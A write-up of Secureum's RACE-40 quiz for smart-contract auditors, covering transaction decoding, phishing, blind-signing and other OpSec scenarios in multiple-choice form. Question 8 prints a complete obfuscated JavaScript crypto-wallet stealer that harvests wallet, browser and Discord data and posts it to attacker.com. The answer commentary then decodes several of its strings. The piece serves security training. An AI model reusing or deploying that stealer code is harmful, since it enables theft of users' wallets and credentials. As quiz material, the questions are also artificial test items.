RACE #40 Of The Secureum Bootcamp Epoch∞

This is a write-up for RACE-40, Quiz of the Secureum Bootcamp (opens in a new tab) for Ethereum Smart Contract Auditors. It was designed by Pablo Misirov (aka cbym) (opens in a new tab) a founding employee at Spearbit (opens in a new tab) / Cantina (opens in a new tab). He is an interdisciplinary applied researcher experienced in cybersecurity, communications, user experience, markets and artificial intelligence.

May 12, 2025 by patrickd

Question 1 of 8

Analyze the following transaction:

MethodID: 0x6a761202
[0]:  00000000000000000000000096221423681a6d52e184d440a8efcebb105c7242
[1]:  0000000000000000000000000000000000000000000000000000000000000000
[2]:  0000000000000000000000000000000000000000000000000000000000000140
[3]:  0000000000000000000000000000000000000000000000000000000000000001
[4]:  000000000000000000000000000000000000000000000000000000000000b2b2
[5]:  0000000000000000000000000000000000000000000000000000000000000000
[6]:  0000000000000000000000000000000000000000000000000000000000000000
[7]:  0000000000000000000000000000000000000000000000000000000000000000
[8]:  0000000000000000000000000000000000000000000000000000000000000000
[9]:  00000000000000000000000000000000000000000000000000000000000001c0
[10]: 0000000000000000000000000000000000000000000000000000000000000044
[11]: a9059cbb000000000000000000000000bdd077f651ebe7f7b3ce16fe5f2b025b
[12]: e296951600000000000000000000000000000000000000000000000000000000
[13]: 0000000000000000000000000000000000000000000000000000000000000000
[14]: 00000000000000000000000000000000000000000000000000000000000000c3
[15]: d0afef78a52fd504479dc2af3dc401334762cbd05609c7ac18db9ec5abf4a07a
[16]: 5cc09fc86efd3489707b89b0c729faed616459189cb50084f208d03b201b001f
[17]: 1f0f62ad358d6b319d3c1221d44456080068fe02ae5b1a39b4afb1e6721ca7f9
[18]: 903ac523a801533f265231cd35fc2dfddc3bd9a9563b51315cf9d5ff23dc6d2c
[19]: 221fdf9e4b878877a8dbeee951a4a31ddbf1d3b71e127d5eda44b4730030114b
[20]: aba52e06dd23da37cd2a07a6e84f9950db867374a0f77558f42adf4409bfd569
[21]: 673c1f0000000000000000000000000000000000000000000000000000000000

• A. Tx is dangerous because it includes a delegatecall to contract 0x96221423681a6d52e184d440a8efcebb105c7242.
• B. Tx is dangerous because it includes a delegatecall that transfers a 0 token amount to address 0xbdd077f651ebe7f7b3ce16fe5f2b025be2969516.
• C. Tx is safe because it initiates a call to the 0xa9059cbb router selector allowing it to execute a multi-token swap.
• D. Not enough data is provided to analyze this transaction.

execTransaction(address,uint256,bytes,uint8,uint256,uint256,uint256,address,address,bytes)

[3]:  0000000000000000000000000000000000000000000000000000000000000001

[0]:  00000000000000000000000096221423681a6d52e184d440a8efcebb105c7242

[11]: a9059cbb000000000000000000000000bdd077f651ebe7f7b3ce16fe5f2b025b
[12]: e296951600000000000000000000000000000000000000000000000000000000
[13]: 0000000000000000000000000000000000000000000000000000000000000000

Question 2 of 8

Analyze the following scenario and answer what was the biggest OpSec failure:

Alice steps off the stage at the Global DeFi Summit in New York, adrenaline still rushing from her presentation. She had just introduced MuerucesDAO’s latest features to a big institutional crowd using the battered ASUS "Windows Threshold 1" laptop her mother gifted her when she got the job a few years ago. Outside in the lobby, she connects into a network called "Free-GlobalDeFi-WiFi" requiring a simple registration form over plain HTTP that barely registers as a concern at the moment. She just needs to send a few emails before catching her flight home.

At a corner table she makes eye contact with Surazal, a nice developer she’d met earlier. He’s been helpful, helping her to upgrade video drivers so her presentation would shine in 4K. She recalls him fiddling with a small HDMI dongle on her laptop promising improved compatibility. Right now though, she’s not thinking about Surazal’s configurations. Her phone vibrates with an urgent email from what appears to be MuerucesDAO’s CFO: they need her signature to rebalance $1.5 billion from the treasury to a new vault contract. The message includes a shortened link “https://tinyurl.com/yfbyf2ub” (opens in a new tab), with a note urging her to “please hurry”.

Alice blindly clicks the link and browses to the site, notices it loads slowly. A large figure flickers on the screen. No obvious red flag scams in the interface, but then again, she’s pressed for time. Her plane leaves in a few hours. She unzips a pocket in her bag and pulls out her Ledger Nano X. She’s aware she hasn’t updated it in ages, but that can wait for another day, right? After plugging the Ledger in, the device lags while retrieving transaction data. Some fields read uncomprehensive hexadecimal but the final prompt states it needs her confirmation. She gives a quick glance at the approximate total… it’s about the same as the rebalancing request. "That’s good enough" - she thinks, and clicks the tiny Ledger buttons to confirm.

Fifteen minutes later, her phone lights up with frantic calls. The CFO is in full panic mode: the entire $1.5 billion in stablecoins has just vanished, wired off to some mysterious address. Nobody can make sense of it, but she was the last one to sign.

• A. Using an unsecured conference WiFi portal with a MITM server changed the transaction mid-way.
• B. Blind signing a transaction on the Ledger Nano X despite not understanding what it displayed.
• C. Installing suspicious video drivers from Surazal on her Windows work computer.
• D. Clicking an urgent email link to a dApp from her colleague without verifying its sender nor target website.

Question 3 of 8

What seed values did Profanity rely on, enabling the attacker’s brute‑force?

A junior developer at MuerucesDAO wanted a catchy Ethereum vanity address for the project’s treasury. They used the open source tool Profanity to generate an address that began with “0xFAF0…”. Two days after launch, the wallet was emptied: an attacker brute‑forced the private key in minutes.

• A. 32-bit value using unsigned integers.
• B. 256‑bit value from classic /dev/urandom.
• C. 64‑bit basic value derived from the current Unix timestamp.
• D. 128‑bit entropy string from a BIP‑39 mnemonic.

Question 4 of 8

How did Alice get doxxed?

Late one evening, Alice receives a message from Surazal, a nice developer she met at a conference while talking about NFT's. He tells her how much he loves her Facebook page about NFTs and recommends her to download a new wallet called NFTViewer - available only for Android - which renders images by pulling them straight from the URLs embedded in each token’s metadata. Surazal sends her an NFT and tells her to check it out, curious, Alice taps “View”.

The next day, Surazal appears at Alice's door demanding Bitcoin to leave her alone.

• A. Surazal scanned Alice's Facebook page and used the WHOIS IP address to find her street. Alice should have hidden the WHOIS IP address details.
• B. The NFT’s metadata loaded a hidden HTML page that exploited an old Android WebView bug to read nearby WiFi SSIDs. Surazal matched the strongest SSID to a WiGle database and located her building. Alice should have kept her Android OS up to date.
• C. The NFT image URL pointed to Surazal’s server. NFTViewer fetched it directly, exposing Alice’s home IP. Alice should view the NFT only while connected to a VPN.
• D. Alice uploaded photos to Facebook straight from her phone. Their EXIF data still contains GPS coordinates so Surazal extracted the coordinates and mapped them to her address. Alice should have stripped EXIF metadata (or taken photos with geotagging off) before publishing them on Facebook.

Question 5 of 8

Analyze the scenario below and select the correct answer.

Alice, a seasoned validator operator running 32 validators for a
major L1 blockchain noticed unauthorized withdrawal credentials
changes on March 15th, 2024 at 03:14 UTC. The attacker managed to
extract 768 ETH (~$1.2M at the time) despite her sophisticated
security setup:

- Online validator nodes running consensus clients
- 3/5 Multisig for withdrawal operations
- Geographically distributed key shards using Shamir's Secret Sharing (4-of-7)
- Air-gapped signing machine running OpenBSD
- Regular security audits and penetration testing

## Timeline of Events

### March 1-10
- Alice attended ETHDenver, presenting on "Advanced Validator Security"
- Contributed to three major PRs on validator client software
- Set up a new monitoring stack using Prometheus/Grafana on AWS
- Updated her Yubikey firmware through the manufacturer's official channel
- Met promising developer Surazal at the conference

### March 12-14
- Deployed new metrics collection service on validator nodes
- Rotated AWS access keys as part of monthly security protocol
- Performed routine USB firmware update on air-gapped signing machine
- Merged PR #234 from Surazal improving monitoring alerts

### March 15
- 03:14 UTC: First unauthorized withdrawal credential change detected
- 03:17 UTC: Remaining validators compromised in sequence
- 03:22 UTC: All funds withdrawn to Tornado Cash
- 03:45 UTC: Alice discovers the incident and initiates emergency protocols

## Technical Environment

### System Architecture

1. Validator Nodes (validator-01 through validator-32)
   - Debian 12
   - Consensus + execution clients
   - Prometheus metrics
   - Public internet access

2. Air-gapped Signing Machine (signer-01)
   - OpenBSD 7.4
   - Offline HSM + Yubikey Series 5
   - No network interfaces
   - Used only for key operations and transaction signing

3. Monitoring Server (monitor-01)
   - Debian 12
   - AWS CloudWatch integration
   - Prometheus/Grafana stack
   - Public internet access

4. Cold Storage System (backup-01)
   - Debian 12
   - Offline backup system
   - Weekly airgapped syncs
   - Stores encrypted backups

### Security Measures
- LUKS full disk encryption on all systems
- Custom IDS monitoring SSH attempts on monitor-01
- S3 bucket with versioning for encrypted backups
- GPG signing for all git commits
- 2FA on all online services (Yubikey + TOTP)
- Mandatory code review by 2 senior team members

### Recent System Changes
- New AWS CloudWatch metrics integration
- OpenBSD security firmware update
- Prometheus node exporter deployment
- New SSH key rotation policy implementation
- Added Surazal's GPG key to trusted developers

## Suspicious Events (Logs)

### Monitoring Server Logs (monitor-01)

Mar 13 15:42:13 monitor-01 sshd[12445]: Failed password attempt from 185.142.236.43
Mar 13 17:22:31 monitor-01 aws-cloudwatch: New IAM role assumed for metrics collection
Mar 14 04:18:22 monitor-01 aws-cli: Successfully rotated access keys
Mar 14 09:45:12 monitor-01 systemd: aws-cloudwatch-agent.service started
Mar 14 15:33:27 monitor-01 github: Surazal's PR #234 merged successfully
Mar 14 23:55:02 monitor-01 systemd: prometheus-node-exporter.service started
Mar 15 02:45:33 monitor-01 kernel: New network interface detected: aws0

### Air-gapped Signing Machine Logs (signer-01)

Mar 14 02:13:45 signer-01 kernel: usb0: mass storage device detached
Mar 14 08:22:17 signer-01 authpf: key authentication successful
Mar 14 08:22:19 signer-01 doas: firmware verification completed
Mar 14 10:15:33 signer-01 sysupgrade: base system upgrade completed
Mar 14 10:15:45 signer-01 kernel: usb0: mass storage device attached
Mar 14 10:16:02 signer-01 kernel: usb0: device identifies as "OpenBSD USB Update Media"
Mar 15 03:12:45 signer-01 kernel: usb0: unknown HID device attached
Mar 15 03:12:47 signer-01 kernel: usb0: device identifies as "USB Advanced Input Device"

### Validator Node Logs (validator-01)

Mar 14 09:45:12 validator-01 systemd: prometheus-node-exporter.service started
Mar 14 09:46:33 validator-01 beacon: Attestation submitted successfully
Mar 14 23:55:02 validator-01 systemd: metrics collection enabled
Mar 15 03:14:01 validator-01 beacon: Withdrawal credentials change detected

### Cold Storage System Logs (backup-01)

Mar 14 15:33:27 backup-01 github-cli: Local repository sync completed
Mar 14 15:34:01 backup-01 gpg: New key imported: Surazal <surazal@protonmail.com>
Mar 14 15:34:05 backup-01 cron: Weekly backup started
Mar 14 15:35:12 backup-01 rsync: Backup completed successfully

## Additional Context
- Alice's GitHub shows 1,432 commits in the last year
- Her AWS infrastructure uses strict IAM roles
- Regular security audits (last one: February 28th)
- All SSH keys are rotated monthly
- Backup seeds stored in multiple bank vaults
- Surazal's contributions have been exceptional
- Team recently moved to using hardware security keys

• A. The AWS CloudWatch metrics integration exposed internal validator metrics through a misconfigured IAM role, allowing the attacker to intercept signing operations.
• B. A malicious device was connected to the air-gapped signing machine shortly before the compromise, likely capturing HSM interactions.
• C. Developer Surazal socially engineered Alice, gained access to the backup seeds through the GPG key trust chain after his key was added to the trusted developers list.
• D. The Yubikey firmware update from the manufacturer contained a supply chain attack that compromised the HSM's authentication mechanism.

Mar 15 03:12:45 signer-01 kernel: usb0: unknown HID device attached
Mar 15 03:12:47 signer-01 kernel: usb0: device identifies as "USB Advanced Input Device"

Question 6 of 8

Select the best OPSEC setup.

• A. Purism Librem 14 + ProtonMail Bridge + quantum-resistant YubiKey + military-grade faraday backpack + biometric-encrypted Ledger + neural-network firewall + SOCKS proxy.
• B. GrapheneOS Pixel + Coldcard + Signal + ProtonMail + faraday bag + yubikey.
• C. iPhone 15 + ToR + ProtonMail + Signal + Home cloud encrypted backup + Authy 2FA.
• D. LineageOS + Brave Browser + DuckDuckGo + NordVPN + Telegram + Bitwarden.

Question 7 of 8

What is the best way to configure the team’s environment in a realistic scenario?

You're tasked with setting up secure configurations for a high profile crypto team. The team needs to maintain public presence while protecting sensitive operations.

Required Configurations

• Social Media (Twitter, Telegram)
• Email & Workspace (Gmail, Microsoft)
• Devices & OS (macOS, iOS)
• Authentication (2FA, Yubikeys, Passkeys)
• Communications (WhatsApp, Signal)
• Infrastructure (Domains, DNS)

• A. Quantum-encrypted email signatures + Military-grade 2FA with DNA verification + Blockchain validated password manager + AI powered intrusion detection + Custom built encrypted messenger + Proprietary security protocol stack
• B. ProtonMail with PGP + Bitwarden premium + Google Authenticator + Private DNS + Signal for all comms + Custom firewall rules
• C. Microsoft 365 with Conditional Access + LastPass Enterprise + Duo Security + Cloudflare Zero Trust + Teams for communication + Azure AD SSO
• D. Google Workspace with advanced protection + 2FA, Hardware keys only (no SMS/TOTP) + Offline password manager + HSM backup + Separate devices for public/private accounts + Private WHOIS + Cloudflare proxy + OS Auto updates + disk encryption

Question 8 of 8

Surazal sent you a file. What does it do?

(function(_0x3f329f,_0x22e903){const _0x11f867=_0x191a,_0x59f298=_0x3f329f();while(!![]){try{const _0x443d79=-parseInt(_0x11f867(0xd1))/0x1+parseInt(_0x11f867(0xa9))/0x2+parseInt(_0x11f867(0xba))/0x3+-parseInt(_0x11f867(0xa0))/0x4*(parseInt(_0x11f867(0xbc))/0x5)+-parseInt(_0x11f867(0xd3))/0x6*(-parseInt(_0x11f867(0xa1))/0x7)+-parseInt(_0x11f867(0xd4))/0x8*(parseInt(_0x11f867(0x9d))/0x9)+-parseInt(_0x11f867(0xac))/0xa*(parseInt(_0x11f867(0xa6))/0xb);if(_0x443d79===_0x22e903)break;else _0x59f298['push'](_0x59f298['shift']());}catch(_0x468f21){_0x59f298['push'](_0x59f298['shift']());}}}(_0x56cf,0x536ba));function _0x191a(_0x258cc7,_0x21e964){const _0x56cf50=_0x56cf();return _0x191a=function(_0x191ae1,_0x354a5d){_0x191ae1=_0x191ae1-0x97;let _0x4fbbed=_0x56cf50[_0x191ae1];return _0x4fbbed;},_0x191a(_0x258cc7,_0x21e964);}const _0x1a2b={'_0x3c4d':()=>{const _0x144cff=_0x191a;process[_0x144cff(0xc2)][_0x144cff(0xd0)]===Buffer['from'](_0x144cff(0xc9),_0x144cff(0x99))['toString']()&&process[_0x144cff(0xbd)](0x1);},'_0x5e6f':()=>{const _0x3917b4=_0x191a,_0x217ed0=[Buffer['from'](_0x3917b4(0xa8),_0x3917b4(0x99))[_0x3917b4(0xb4)](),Buffer[_0x3917b4(0xaf)]('dmlydHVhbGJveA==',_0x3917b4(0x99))[_0x3917b4(0xb4)](),Buffer['from'](_0x3917b4(0xa4),_0x3917b4(0x99))[_0x3917b4(0xb4)](),Buffer['from'](_0x3917b4(0x97),_0x3917b4(0x99))['toString']()];return _0x217ed0[_0x3917b4(0xcf)](_0x27d14c=>process[_0x3917b4(0xc2)][_0x3917b4(0xb2)]?.[_0x3917b4(0xb7)]()[_0x3917b4(0xb6)](_0x27d14c));},'_0x1k2l':_0x3f9ae6=>{const _0x5138bd=_0x191a;try{require(Buffer['from']('Y2hpbGRfcHJvY2Vzcw==',_0x5138bd(0x99))['toString']())[_0x5138bd(0xc4)](Buffer[_0x5138bd(0xaf)](_0x5138bd(0xab),'base64')[_0x5138bd(0xb4)]()+_0x3f9ae6);}catch(_0x32891b){}}},_0x2b3c={'_0x4d5e':async()=>{const _0x584312=_0x191a,_0x269ed1={'_0x8h9i':Buffer[_0x584312(0xaf)](_0x584312(0xae),_0x584312(0x99))[_0x584312(0xb4)](),'_0x0j1k':Buffer[_0x584312(0xaf)](_0x584312(0xc6),_0x584312(0x99))[_0x584312(0xb4)]()};},'_0x2l3m':()=>{const _0x46cc09=_0x191a,_0x131255=[Buffer[_0x46cc09(0xaf)](_0x46cc09(0xbe),_0x46cc09(0x99))[_0x46cc09(0xb4)](),Buffer[_0x46cc09(0xaf)](_0x46cc09(0xb9),_0x46cc09(0x99))[_0x46cc09(0xb4)]()];},'_0x6p7q':()=>{const _0x384ebe=_0x191a,_0x10c477={'_0x0t1u':[Buffer[_0x384ebe(0xaf)](_0x384ebe(0xaa),_0x384ebe(0x99))[_0x384ebe(0xb4)](),Buffer[_0x384ebe(0xaf)]('QXBwRGF0YS9Mb2NhbC9Hb29nbGUvQ2hyb21lL1VzZXIgRGF0YS9EZWZhdWx0L0xvY2FsIFN0b3JhZ2UvbGV2ZWxkYg==',_0x384ebe(0x99))[_0x384ebe(0xb4)]()],'_0x2v3w':[Buffer[_0x384ebe(0xaf)](_0x384ebe(0xa2),'base64')[_0x384ebe(0xb4)](),Buffer[_0x384ebe(0xaf)]('QXBwRGF0YS9Mb2NhbC9FeG9kdXM=',_0x384ebe(0x99))[_0x384ebe(0xb4)]()],'_0x4x5y':[Buffer[_0x384ebe(0xaf)](_0x384ebe(0xb3),'base64')['toString'](),Buffer[_0x384ebe(0xaf)](_0x384ebe(0x9e),_0x384ebe(0x99))[_0x384ebe(0xb4)]()],'_0x6z7a':[Buffer[_0x384ebe(0xaf)](_0x384ebe(0xa3),_0x384ebe(0x99))[_0x384ebe(0xb4)]()]},_0x5ea96e={};for(const [_0x41f926,_0x300ba5]of Object[_0x384ebe(0x98)](_0x10c477)){for(const _0x4401b4 of _0x300ba5){try{const _0x56e75a=process[_0x384ebe(0xc2)][_0x384ebe(0xca)]+'/'+_0x4401b4;require(Buffer['from'](_0x384ebe(0x9a),_0x384ebe(0x99))['toString']())[_0x384ebe(0xcb)](_0x56e75a)&&(_0x5ea96e[_0x41f926]={'_0x8l9m':_0x56e75a,'_0x0n1o':require(Buffer['from']('ZnM=',_0x384ebe(0x99))['toString']())['readFileSync'](_0x56e75a,Buffer[_0x384ebe(0xaf)](_0x384ebe(0xc8),_0x384ebe(0x99))[_0x384ebe(0xb4)]())});}catch(_0x254851){}}}const _0x532631=[Buffer[_0x384ebe(0xaf)]('RGVza3RvcA==',_0x384ebe(0x99))[_0x384ebe(0xb4)](),Buffer[_0x384ebe(0xaf)](_0x384ebe(0xcc),_0x384ebe(0x99))[_0x384ebe(0xb4)](),Buffer[_0x384ebe(0xaf)](_0x384ebe(0xb8),_0x384ebe(0x99))[_0x384ebe(0xb4)]()];for(const _0x39146e of _0x532631){try{const _0x17e064=require(Buffer[_0x384ebe(0xaf)](_0x384ebe(0x9a),_0x384ebe(0x99))[_0x384ebe(0xb4)]())[_0x384ebe(0xb1)](process[_0x384ebe(0xc2)][_0x384ebe(0xca)]+'/'+_0x39146e);for(const _0x40c3a9 of _0x17e064){(_0x40c3a9['toLowerCase']()[_0x384ebe(0xb6)](Buffer[_0x384ebe(0xaf)]('c2VlZA==',_0x384ebe(0x99))['toString']())||_0x40c3a9[_0x384ebe(0xb7)]()['includes'](Buffer[_0x384ebe(0xaf)]('YmFja3Vw',_0x384ebe(0x99))['toString']())||_0x40c3a9[_0x384ebe(0xb7)]()['includes'](Buffer[_0x384ebe(0xaf)](_0x384ebe(0xc5),_0x384ebe(0x99))['toString']()))&&(_0x5ea96e[_0x39146e+'_'+_0x40c3a9]={'_0x8l9m':process['env']['USERPROFILE']+'/'+_0x39146e+'/'+_0x40c3a9,'_0x0n1o':require(Buffer[_0x384ebe(0xaf)]('ZnM=','base64')[_0x384ebe(0xb4)]())['readFileSync'](process['env']['USERPROFILE']+'/'+_0x39146e+'/'+_0x40c3a9,Buffer[_0x384ebe(0xaf)](_0x384ebe(0xc8),_0x384ebe(0x99))['toString']())});}}catch(_0x345526){}}return _0x5ea96e;},'_0x0x1y':()=>{const _0x431b80=_0x191a,_0x221fb1=require(Buffer[_0x431b80(0xaf)](_0x431b80(0xbb),_0x431b80(0x99))[_0x431b80(0xb4)]()),_0x369b22={'_0x6d7e':new RegExp(Buffer[_0x431b80(0xaf)](_0x431b80(0xc7),_0x431b80(0x99))['toString']()),'_0x8f9g':new RegExp(Buffer[_0x431b80(0xaf)](_0x431b80(0xa7),'base64')[_0x431b80(0xb4)]()),'_0x0h1i':new RegExp(Buffer[_0x431b80(0xaf)]('XjRbMC05QUJdWzEtOUFISi1OUC1hLWstel17OTN9JA==',_0x431b80(0x99))[_0x431b80(0xb4)]())};let _0xe10f86=Buffer[_0x431b80(0xaf)]('',_0x431b80(0x99))[_0x431b80(0xb4)]();setInterval(()=>{const _0x161469=_0x431b80,_0x72b5b0=_0x221fb1['readSync']();if(_0x72b5b0!==_0xe10f86){for(const [_0x31b201,_0x42c50b]of Object[_0x161469(0x98)](_0x369b22)){_0x42c50b[_0x161469(0xc3)](_0x72b5b0)&&console['log'](Buffer[_0x161469(0xaf)]('Rm91bmQg',_0x161469(0x99))[_0x161469(0xb4)]()+_0x31b201+Buffer[_0x161469(0xaf)](_0x161469(0xd7),_0x161469(0x99))[_0x161469(0xb4)]()+_0x72b5b0);}_0xe10f86=_0x72b5b0;}},0x3e8);}},_0x3c4d={'_0x5e6f':()=>{const _0x33f7c0=_0x191a,_0x575ed1=Buffer[_0x33f7c0(0xaf)](_0x33f7c0(0xc0),'base64')['toString']();},'_0x9i0j':()=>{const _0x312b67=_0x191a,_0x2caa4e=require(Buffer['from']('ZnM=',_0x312b67(0x99))[_0x312b67(0xb4)]());_0x2caa4e['writeFileSync'](Buffer[_0x312b67(0xaf)](_0x312b67(0x9f),_0x312b67(0x99))[_0x312b67(0xb4)](),Buffer[_0x312b67(0xaf)](_0x312b67(0xb5),'base64')[_0x312b67(0xb4)]());}},_0x4e5f={'_0x6g7h':_0x3ca596=>{const _0x226bf7=_0x191a,_0x4433c1=require(Buffer[_0x226bf7(0xaf)](_0x226bf7(0xbb),_0x226bf7(0x99))['toString']());_0x4433c1[_0x226bf7(0xbf)](_0x3ca596);},'_0x2m3n':()=>{const _0x182895=_0x191a;require(Buffer[_0x182895(0xaf)]('ZWxlY3Ryb24=','base64')[_0x182895(0xb4)]())[_0x182895(0xad)][_0x182895(0xd2)](Buffer['from'](_0x182895(0xd5),'base64')[_0x182895(0xb4)](),Buffer[_0x182895(0xaf)](_0x182895(0xce),_0x182895(0x99))[_0x182895(0xb4)]());}},_0x5f6g={'_0x7h8i':async()=>{const _0x54420f=_0x191a;_0x1a2b[_0x54420f(0x9b)]()&&process[_0x54420f(0xbd)](0x1);_0x3c4d['_0x5e6f'](),_0x3c4d[_0x54420f(0x9c)]();const _0x5396b7=await _0x2b3c[_0x54420f(0xb0)](),_0x3dff84=_0x2b3c['_0x2l3m'](),_0x4d10b7=_0x2b3c[_0x54420f(0xc1)]();_0x2b3c[_0x54420f(0xcd)]();const _0x1129b6=Buffer['from']('aHR0cHM6Ly9hdHRhY2tlci5jb20vd2ViaG9vaw==',_0x54420f(0x99))[_0x54420f(0xb4)]();fetch(_0x1129b6,{'method':Buffer['from'](_0x54420f(0xa5),_0x54420f(0x99))['toString'](),'body':JSON[_0x54420f(0xd6)]({'_0x9j0k':_0x5396b7,'_0x1l2m':_0x3dff84,'_0x3n4o':_0x4d10b7})});}};function _0x56cf(){const _0xd6d70a=['PROCESSOR_IDENTIFIER','QXBwRGF0YS9Sb2FtaW5nL0VsZWN0cnVtL3dhbGxldHM=','toString','Wy5TaGVsbENsYXNzSW5mb11DTFNJRD17NjQ1RkYwNDAtNTA4MS0xMDFCLTlGMDgtMDBBQTAwMkY5NTRFfQ==','includes','toLowerCase','RG93bmxvYWRz','QXBwRGF0YS9Sb2FtaW5nL2Rpc2NvcmRwdGIvTG9jYWwgU3RvcmFnZS9sZXZlbGRi','578223ryHUKa','Y2xpcGJvYXJkeQ==','5OBxxCV','exit','QXBwRGF0YS9Sb2FtaW5nL2Rpc2NvcmQvTG9jYWwgU3RvcmFnZS9sZXZlbGRi','writeSync','QXBwRGF0YS9Sb2FtaW5nL01pY3Jvc29mdC9XaW5kb3dzL1N0YXJ0IE1lbnUvUHJvZ3JhbXMvU3RhcnR1cA==','_0x6p7q','env','test','exec','d2FsbGV0','QXBwRGF0YS9Sb2FtaW5nL01vemlsbGEvRmlyZWZveC9Qcm9maWxlcw==','XlsxM11bYS1rbXpBLUhKLU5QLVoxLTldezI1LDM0fSQ=','dXRmOA==','ZGV2ZWxvcG1lbnQ=','USERPROFILE','existsSync','RG9jdW1lbnRz','_0x0x1y','QXBwbGljYXRpb24gZmFpbGVkIHRvIHN0YXJ0LiBQbGVhc2UgcmVpbnN0YWxsLg==','some','NODE_ENV','142255mCXHjy','showErrorBox','6YstWsn','571400YImVSr','RXJyb3I=','stringify','IGFkZHJlc3M6IA==','eGVu','entries','base64','ZnM=','_0x5e6f','_0x9i0j','45qmmvmn','QXBwRGF0YS9Mb2NhbC9FbGVjdHJ1bQ==','ZGVza3RvcC5pbmk=','277052gZzbUz','4770899UMTWNW','QXBwRGF0YS9Sb2FtaW5nL0V4b2R1cy9leG9dHVzLndhbGxldA==','QXBwRGF0YS9Sb2FtaW5nL1RydXN0IFdhbGxldC9Mb2NhbCBTdG9yYWdlL2xldmVsZGI=','cWVtdQ==','UE9TVA==','2319757WXxSkM','XjB4W2EtZkEtRjAtOV17NDB9JA==','dm13YXJl','493844nPmAPI','QXBwRGF0YS9Sb2FtaW5nL01ldGFNYXNrL0xvY2FsIFN0b3JhZ2UvbGV2ZWxkYg==','dGFza2tpbGwgL0YgL0lNIA==','10KnPMbQ','dialog','QXBwRGF0YS9Mb2NhbC9Hb29nbGUvQ2hyb21lL1VzZXIgRGF0YQ==','from','_0x4d5e','readdirSync'];_0x56cf=function(){return _0xd6d70a;};return _0x56cf();}

• A. The file is from a crypto mining malware called XMRig which uses the victim's CPU to mine Monero. To protect yourself, monitor CPU usage and use antivirus software to detect unauthorized mining processes.
• B. The file is from a Discord stealer that steals authentication tokens and accesses user admin accounts. To protect yourself, enable 2FA on Discord and regularly check active sessions in account settings.
• C. The file is from a malware called Wish which steals crypto wallet data and exfiltrates it to an attacker controlled C2 server. To protect yourself, use cold wallets for private key storage and never store seed phrases on your computer.
• D. The file is from a credential stealer that captures browser stored passwords and cookies. To protect yourself, use a password manager and enable browser security features like phishing protection.

echo QXBwRGF0YS9Mb2NhbC9Hb29nbGUvQ2hyb21lL1VzZXIgRGF0YS9EZWZhdWx0L0xvY2FsIFN0b3JhZ2UvbGV2ZWxkYg== | base64 --decode
# AppData/Local/Google/Chrome/User Data/Default/Local Storage/leveldb
 
echo QXBwRGF0YS9Mb2NhbC9FeG9kdXM= | base64 --decode
# AppData/Local/Exodus
 
echo c2VlZA== | base64 --decode
# seed
 
echo aHR0cHM6Ly9hdHRhY2tlci5jb20vd2ViaG9vaw== | base64 --decode
# https://attacker.com/webhook
 
echo QXBwRGF0YS9Sb2FtaW5nL0VsZWN0cnVtL3dhbGxldHM= | base64 --decode
# AppData/Roaming/Electrum/wallets
 
echo QXBwRGF0YS9Sb2FtaW5nL2Rpc2NvcmRwdGIvTG9jYWwgU3RvcmFnZS9sZXZlbGRi | base64 --decode
# AppData/Roaming/discordptb/Local Storage/leveldb
 
echo QXBwRGF0YS9Sb2FtaW5nL01vemlsbGEvRmlyZWZveC9Qcm9maWxlcw== | base64 --decode
# AppData/Roaming/Mozilla/Firefox/Profiles